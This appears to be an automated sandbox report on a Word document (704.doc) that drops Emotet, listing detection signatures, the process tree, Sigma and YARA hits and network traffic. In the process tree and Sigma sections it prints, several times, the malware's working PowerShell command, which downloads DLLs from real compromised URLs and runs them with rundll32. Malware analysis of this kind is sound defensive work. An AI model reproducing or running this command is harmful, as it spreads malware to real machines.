Loading ...

Play interactive tourEdit tour

Windows Analysis Report 704.doc

Overview

General Information

Sample Name:704.doc
Analysis ID:526268
MD5:40f85d07da2533d576b1f2d7c043a2da
SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Yara detected Emotet Downloader
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6924 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • cmd.exe (PID: 4128 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6312 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • rundll32.exe (PID: 1376 cmdline: "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x9be4:$s1: \Common Files\Microsoft Shared\
  • 0x9f3c:$s1: \Common Files\Microsoft Shared\
  • 0x41e1:$s2: Scripting.FileSystemObject
  • 0x5318:$a1: Document_Open
  • 0x9203:$a1: Document_Open
  • 0xa612:$a1: Document_Open
  • 0xba62:$a1: Document_Open
C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6924, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 4128
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4128, ProcessCommandLine: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebReques
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132820573608402300.6312.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://ckfoods.net/wp-admin/wPInm2rgMu/Avira URL Cloud: Label: malware
    Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/Avira URL Cloud: Label: malware
    Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/Avira URL Cloud: Label: malware
    Machine Learning detection for sampleShow sources
    Source: 704.docJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
    Source: global trafficDNS query: name: primtalent.com
    Source: global trafficTCP traffic: 192.168.2.4:49754 -> 148.72.96.3:80
    Source: global trafficTCP traffic: 192.168.2.4:49754 -> 148.72.96.3:80
    Source: winword.exeMemory has grown: Private usage: 0MB later: 76MB
    Source: Joe Sandbox ViewASN Name: HINETDataCommunicationBusinessGroupTW HINETDataCommunicationBusinessGroupTW
    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
    Source: global trafficHTTP traffic detected: GET /wp-admin/9yt1u/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: primtalent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 12:23:07 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
    Source: powershell.exe, 00000006.00000002.754451635.000000000531E000.00000004.00000001.sdmpString found in binary or memory: http://huskysb.com4
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://primtalent.com
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
    Source: powershell.exe, 00000006.00000002.753910843.0000000005021000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/.Split/p
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/XnG/.Splitplits/
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Split
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/h
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tp
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.aadrm.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.aadrm.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.office.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.onedrive.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://augloop.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cdn.entity.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://clients.config.office.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://config.edge.skype.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
